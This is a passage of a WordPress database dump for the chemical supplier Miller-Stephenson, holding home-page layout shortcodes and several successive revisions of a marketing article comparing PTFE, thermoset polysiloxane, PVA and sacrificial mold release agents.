'64-revision-v1', '', '', '2016-09-12 16:46:27', '2016-09-12 16:46:27', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1552, 1, '2016-09-12 17:00:11', '2016-09-12 17:00:11', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<h2>SINCE 1955</h2>\n\n[/text_box]\n[text_box position_y="15"]\n\n<p><H3>\n<p><em>Quality &amp; Service</em></p>\n</h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX & LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS & SOLVENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="1078" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY & CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4 class="alt-font">INTRODUCING</h4>\n[divider]\n\n<h1>ReleaSys <strong>™ </strong></h1>\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\n[button text="TELL ME MORE" style="white alt-button" link="introducing-releasys-our-newest-release-agent/"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1259" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1253" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1249" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1248"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="595"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1261"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1255"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1257"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-12 17:00:11', '2016-09-12 17:00:11', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1553, 3, '2016-09-12 18:06:10', '2016-09-12 18:06:10', 'Mold release agents provides the critical barrier between a tooling surface and molding substrate.  These release agent enabling separation of the cured part from the mold. Irregular applications and incorrect release agent choice will have dramatic effect of the quality of your finished product There are several distinct release agent systems: Sacrificial, PVA (polyvinyl alcohol, PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Level of surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within the types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release products will see a return on that investment in their bottom line.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest costing materials, offering adequate slip and chemical inertness.  Unfortunately these agents must re-applied after each molding process, and will transfer to molding part, thus requiring time-consuming cleaning of the mold part.  Interestingly, while the initial cost may be lower than PTFE or thermosett polysiloxanes, the overall cost is substantially more are one can expect significantly more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent systems.  In an effort to help guide process engineers in the selecting which agent would work best for their molding application we have summarized the leading attributes of for each agent.\r\n\r\nMiller-Stephenson\'s PTFE-based release agents(MS-122/143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability.  PTFE-release agents contain no silicones, surfactants, or waxes and are thermal stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining to the molding substrate.  Formulations for this class of fluoropolymer can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no  additional cure time is needed. Fluoropolymer release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers.  PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be troublesome with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates.\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically thermosets require a cure-time once the solvent has evaporated to allow sufficient crosslinking and surface adhesion. Cure films are extremely durable, chemically-resistant , have high surface slip, and have peak temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or post-mold applications of paint or other coatings.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new ReleaSys product line offers the most advanced semi-permanent thermoset mold release agents offers a full line of release agents to meet your needs.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers.  ReleaSys should not be used to mold any silicone or fluorosilicone based substrates.\r\n\r\n&nbsp;', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-09-12 18:06:10', '2016-09-12 18:06:10', '', 1525, 'https://132.148.10.86/wordpress/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1554, 3, '2016-09-12 18:07:55', '2016-09-12 18:07:55', 'PTFE mold release agents and reactive polysiloxanes. ReleaSys', 'Mold Release Agents', 'Miller-Stephenson Mold release agent are utilized by major companies worldwide', 'inherit', 'open', 'closed', '', 'mold-release-agent-miller-stephenson', '', '', '2017-06-15 15:39:49', '2017-06-15 15:39:49', '', 1525, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/mold-release-agent-miller-stephenson.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1555, 3, '2016-09-12 18:08:18', '2016-09-12 18:08:18', '<img class="alignnone  wp-image-1554" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/mold-release-agent-miller-stephenson-800x534.jpg" alt="mold-release-agent-miller-stephenson" width="697" height="465" />\r\n\r\nMold release agents provides the critical barrier between a tooling surface and molding substrate.  These release agent enabling separation of the cured part from the mold. Irregular applications and incorrect release agent choice will have dramatic effect of the quality of your finished product There are several distinct release agent systems: Sacrificial, PVA (polyvinyl alcohol, PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Level of surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within the types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release products will see a return on that investment in their bottom line.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest costing materials, offering adequate slip and chemical inertness.  Unfortunately these agents must re-applied after each molding process, and will transfer to molding part, thus requiring time-consuming cleaning of the mold part.  Interestingly, while the initial cost may be lower than PTFE or thermosett polysiloxanes, the overall cost is substantially more are one can expect significantly more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent systems.  In an effort to help guide process engineers in the selecting which agent would work best for their molding application we have summarized the leading attributes of for each agent.\r\n\r\nMiller-Stephenson\'s PTFE-based release agents(MS-122/143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability.  PTFE-release agents contain no silicones, surfactants, or waxes and are thermal stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining to the molding substrate.  Formulations for this class of fluoropolymer can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no  additional cure time is needed. Fluoropolymer release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers.  PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be troublesome with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates.\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically thermosets require a cure-time once the solvent has evaporated to allow sufficient crosslinking and surface adhesion. Cure films are extremely durable, chemically-resistant , have high surface slip, and have peak temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or post-mold applications of paint or other coatings.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new ReleaSys product line offers the most advanced semi-permanent thermoset mold release agents offers a full line of release agents to meet your needs.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers.  ReleaSys should not be used to mold any silicone or fluorosilicone based substrates.\r\n\r\n&nbsp;', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-09-12 18:08:18', '2016-09-12 18:08:18', '', 1525, 'https://132.148.10.86/wordpress/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1556, 3, '2016-09-12 18:24:03', '2016-09-12 18:24:03', '<img class="alignnone wp-image-1554" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/mold-release-agent-miller-stephenson-800x534.jpg" alt="mold-release-agent-miller-stephenson" width="697" height="465" />\r\n\r\nMold release agents provides the critical barrier between a molding surface and the substrate enabling separation of the cured, finished part from the mold surface. Irregular applications and improper release agent choice will have a dramatic effect on the quality and consistency of your finished product.   It is therefore critical the process engineer is knowledgeable for which mold release agent compliments there production method.  There are several distinct release agent systems: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Level of surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within the types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release products will see a return on that investment in their bottom line.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest costing materials, offering adequate slip and chemical inertness.  Unfortunately these agents must re-applied after each molding process, and will transfer to molding part, thus requiring time-consuming cleaning of the mold part.  Interestingly, while the initial cost may be lower than PTFE or thermosett polysiloxanes, the overall cost is substantially more are one can expect significantly more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent systems.  In an effort to help guide process engineers in the selecting which agent would work best for their molding application we have summarized the leading attributes of for each agent.\r\n\r\nMiller-Stephenson\'s PTFE-based release agents(MS-122/143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability.  PTFE-release agents contain no silicones, surfactants, or waxes and are thermal stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining to the molding substrate.  Formulations for this class of fluoropolymer can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no  additional cure time is needed. Fluoropolymer release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers.  PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be troublesome with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates.  PTFE, on an release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s MS-122AV and MS-122SE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry to enhances releases per application.\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically thermosets require a cure-time once the solvent has evaporated to allow sufficient crosslinking and surface adhesion. Cure films are extremely durable, chemically-resistant , have high surface slip, and have peak temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or post-mold applications of paint or other coatings.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new ReleaSys product line offers the most advanced semi-permanent thermoset mold release agents offers a full line of release agents to meet your needs.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers.  ReleaSys should not be used to mold any silicone or fluorosilicone based substrates.\r\n\r\n&nbsp;', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-09-12 18:24:03', '2016-09-12 18:24:03', '', 1525, 'https://132.148.10.86/wordpress/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1557, 3, '2016-09-12 18:57:54', '2016-09-12 18:57:54', '<img class="alignnone wp-image-1554" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/mold-release-agent-miller-stephenson-800x534.jpg" alt="mold-release-agent-miller-stephenson" width="697" height="465" />\r\n\r\nMold release agents provides the critical barrier between a molding surface and the substrate enabling separation of the cured, finished part from the mold surface. Irregular applications and improper release agent choice will have a dramatic effect on the quality and consistency of your finished product.   It is therefore critical the process engineer is knowledgeable for which mold release agent compliments there production method.  There are several distinct release agent systems: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Level of surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within the types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release products will see a return on that investment in their bottom line.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest costing materials, offering adequate slip and chemical inertness.  Unfortunately these agents must re-applied after each molding process, and will transfer to molding part, thus requiring time-consuming cleaning of the mold part.  Interestingly, while the initial cost may be lower than PTFE or thermosett polysiloxanes, the overall cost is substantially more are one can expect significantly more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent systems.  In an effort to help guide process engineers in the selecting which agent would work best for their molding application we have summarized the leading attributes of for each agent.\r\n\r\nMiller-Stephenson\'s PTFE-based release agents(MS-122/143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability.  PTFE-release agents contain no silicones, surfactants, or waxes and are thermal stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining to the molding substrate.  Formulations for this class of fluoropolymer can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no  additional cure time is needed. Fluoropolymer release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers.  PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be troublesome with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates.  PTFE, on an release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s MS-122AV and MS-122SE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry to enhances releases per application.\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cure films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating adhesion.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new ReleaSys product line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers.  ReleaSys should not be used to mold any silicone or fluorosilicone based substrates.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-09-12 18:57:54', '2016-09-12 18:57:54', '', 1525, 'https://132.148.10.86/wordpress/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1558, 3, '2016-09-12 19:05:40', '2016-09-12 19:05:40', '<img class="alignnone wp-image-1554" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/mold-release-agent-miller-stephenson-800x534.jpg" alt="mold-release-agent-miller-stephenson" width="697" height="465" />\r\n\r\nMold release agents provides the critical barrier between a molding surface and the substrate enabling separation of the cured, finished part from the mold surface. Irregular applications and improper release agent choice will have a dramatic effect on the quality and consistency of your finished product.   It is therefore critical the process engineer is knowledgeable for which mold release agent compliments there production method.  There are several distinct release agent systems: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Level of surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within the types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release products will see a return on that investment in their bottom line.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest costing materials, offering adequate slip and chemical inertness.  Unfortunately these agents must re-applied after each molding process, and will transfer to molding part, thus requiring time-consuming cleaning of the mold part.  Interestingly, while the initial cost may be lower than PTFE or thermosett polysiloxanes, the overall cost is substantially more are one can expect significantly more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent systems.  In an effort to help guide process engineers in the selecting which agent would work best for their molding application we have summarized the leading attributes of for each agent.\r\n\r\nMiller-Stephenson\'s PTFE-based release agents(MS-122/143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability.  PTFE-release agents contain no silicones, surfactants, or waxes and are thermal stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining to the molding substrate.  Formulations for this class of fluoropolymer can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no  additional cure time is needed. Fluoropolymer release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers.  PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be troublesome with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates.  PTFE, on an release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s MS-122AV and MS-122SE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry to enhances releases per application.\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cure films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating adhesion.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new ReleaSys product line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers.  ReleaSys should not be used to mold any silicone or fluorosilicone based substrates.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-09-12 19:05:40', '2016-09-12 19:05:40', '', 1525, 'https://132.148.10.86/wordpress/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1559, 3, '2016-09-12 19:10:02', '2016-09-12 19:10:02', '', 'ptfe-mold-release', '', 'inherit', 'open', 'closed', '', 'ptfe-mold-release', '', '', '2016-09-12 19:10:02', '2016-09-12 19:10:02', '', 1525, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/PTFE-mold-release.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1560, 3, '2016-09-12 19:10:40', '2016-09-12 19:10:40', '<img class="alignnone wp-image-1554" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/mold-release-agent-miller-stephenson-800x534.jpg" alt="mold-release-agent-miller-stephenson" width="697" height="465" />\r\n\r\nMold release agents provides the critical barrier between a molding surface and the substrate enabling separation of the cured, finished part from the mold surface. Irregular applications and improper release agent choice will have a dramatic effect on the quality and consistency of your finished product.   It is therefore critical the process engineer is knowledgeable for which mold release agent compliments there production method.  There are several distinct release agent systems: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Level of surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within the types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release products will see a return on that investment in their bottom line.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest costing materials, offering adequate slip and chemical inertness.  Unfortunately these agents must re-applied after each molding process, and will transfer to molding part, thus requiring time-consuming cleaning of the mold part.  Interestingly, while the initial cost may be lower than PTFE or thermosett polysiloxanes, the overall cost is substantially more are one can expect significantly more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent systems.  In an effort to help guide process engineers in the selecting which agent would work best for their molding application we have summarized the leading attributes of for each agent.\r\n\r\n<strong>PTFE Release Agents</strong>\r\n\r\nMiller-Stephenson\'s PTFE-based release agents(MS-122/143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability.  PTFE-release agents contain no silicones, surfactants, or waxes and <img class="wp-image-1559 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" />are thermal stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining to the molding substrate.  Formulations for this class of fluoropolymer can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no  additional cure time is needed. Fluoropolymer release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers.  PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be troublesome with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates.  PTFE, on an release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s MS-122AV and MS-122SE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry to enhances releases per application.\r\n\r\n<strong>Thermoset polysiloxanes</strong>\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cure films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating adhesion.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new ReleaSys product line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers.  ReleaSys should not be used to mold any silicone or fluorosilicone based substrates.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-09-12 19:10:40', '2016-09-12 19:10:40', '', 1525, 'https://132.148.10.86/wordpress/1525-revision-v1/', 0, 'revision', '', 0); 
